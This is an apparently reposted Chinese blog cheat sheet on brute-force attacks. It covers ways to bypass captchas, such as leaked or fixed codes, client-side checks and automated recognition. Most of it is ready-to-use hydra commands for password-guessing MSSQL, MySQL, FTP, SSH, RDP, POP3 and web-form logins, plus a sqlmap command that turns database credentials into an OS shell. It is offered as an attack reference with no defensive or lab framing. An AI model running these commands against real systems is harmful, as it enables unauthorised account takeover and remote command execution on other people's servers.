爆破相关整理 た 入场券 2021-11-02 02:34 376阅读 0赞 验证码 验证码泄露 网站的源码中 请求的Cookie中 爆破 无条件不刷新 -验证码固定 - 直接爆破 有条件不刷新(如客户端通过js生成)- 验证码在前端校验-抓包爆破 验证码自动识别 通过接口返回验证码-接口唯一/验证码不唯一(Java一般以.do结尾)- 使用工具PKAV HTTP FUzzer 和 Burpsuite 爆破 burpsuite插件 reCAPTCHA hydra mssql hydra.exe -l sa -P c:\pass.txt 192.168.1.110 mssql mysql hydra.exe -L c:\user.txt -P c:\pass.txt 192.168.1.110 mysql FTP hydra.exe -l admin -P c:\pass.txt -t 5 192.168.1.110 ftp ssh hydra.exe -L users.txt -P password.txt -e n -t 5 -vV 192.168.1.110 ssh rdp hydra.exe -l administrator -P c:\pass.txt www.xxser.com rdp -V pop3 hydra.exe -l root -P pass.txt my.pop3.mail pop3 sqlmap.py -d "mssql://sa:pwd@123@192.168.1.110:1433/master" --os-shell sqlmap通过密码提权 Post登录 hydra -l admin -P pwd.txt -v IP http-post-form "/:username=^USER^&password=^PASS^&this_is_the=data&next=:<title>| Django site admin</title>" 转载于:https://www.cnblogs.com/AtesetEnginner/p/11214480.html
还没有评论,来说两句吧...